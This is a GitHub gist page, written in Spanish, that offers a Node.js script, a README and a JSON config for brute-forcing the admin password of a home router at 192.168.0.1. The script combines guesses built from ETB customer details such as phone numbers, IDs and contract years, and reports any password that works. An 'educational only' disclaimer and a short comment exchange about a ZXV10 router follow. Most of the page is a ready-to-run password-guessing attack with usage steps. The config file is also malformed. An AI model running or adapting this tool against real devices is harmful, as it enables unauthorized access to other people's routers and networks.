Skip to content

Instantly share code, notes, and snippets.

@jamlfy

jamlfy/LEEME.md

Last active December 15, 2015 20:38
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save jamlfy/9fa7c22cde6283b45aca to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save jamlfy/9fa7c22cde6283b45aca to your computer and use it in GitHub Desktop.
Download ZIP
Este pedazo de software ataca el Router (Si esta conectado) y obtiene la contraseña y la muestra. Usted debe adicionar los datos de posibles contraseñas
Raw
ataqueRouter.js
const name = './pruebas.json';
const fs = require('fs');
const request = require('request');
const async = require('async');
const _ = require('underscore');
var all = require(name);
var listPass = [];
for (var i = all.number - 1; i >= 0; i--){
var nums = _.random(1, 3);
var clave = [];
for (var z = nums - 1; z >= 0; z--) {
clave.push( _.sample(all.models, 1) );
}
listPass.push(clave.join(''));
}
listPass = _.difference(listPass, all.ok);
console.log('Ataque de', listPass.length );
async.filter(listPass,
function (item, callback){
request.get(all.url, {
'auth': {
'user': all.user,
'pass': item,
'sendImmediately': false
}
}, function (err, otro, body) {
if( !/Protected|Error/gim.test(body || 'Error')){
callback(item);
} else {
callback();
}
});
},function (err){
for (var i = err.length - 1; i >= 0; i--)
console.log('Posible contraseña', err[i]);
all.ok = _.union(all.ok, listPass);
fs.writeFile(name, JSON.stringify(all, null, '\t'), function (err) {
if(err) console.error(err);
});
});
Raw
LEEME.md

Se tiene que descargar NodeJS, descarge estos dos archivos.

Abra una consola u terminal, escriba en la carpeta donde lo descargo estos archivos

$ npm install request async underscore

Ahora, modifique la configuracion es decir abra el archivo llamado prueba y coloque los datos

$ node attack.js

Espere y le dira si obtuvo la contraseña lo dira, si no vuelva a ejecutar el paso anterior. Si le muestra Ataque de 0, eso quiere decir que se le acabaron las posiblidades. Debe aumentar colocar mas posiblies palabras, en la configuracion.

Nota: Solo es de uso EDUCATIVO! NO ME HAGO RESPONSABLE DE LO QUE SE PUEDA HACER CON ESTE SOFTWARE!

Anotacion debe estar conectado al router ya sea via wiffi o cable

Raw
pruebas.json
{
"url": "http://192.168.0.1/",
"models": [
"soporte",
"ETB",
"etb",
2006
"cliente",
AÑO-DE-CONTRATACION,
NUMERO-TELEFONICO,
NUMERO-ID,
NUMERO-CLIENTE,
],
"number": 3000,
"user": "Administrator",
"ok": [
]
}
@Royedc4
Copy link

Royedc4 commented Aug 26, 2015

Para:
Model: ZXV10 W300
Fw: W300V1.0.4c_ZRD_CO1
Muestra todas las posibles combinaciones como 'Posible contraseña", y aparentemente ninguno funciona.

@jamlfy
Copy link
Author

jamlfy commented Dec 15, 2015

Voy a revisar!!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment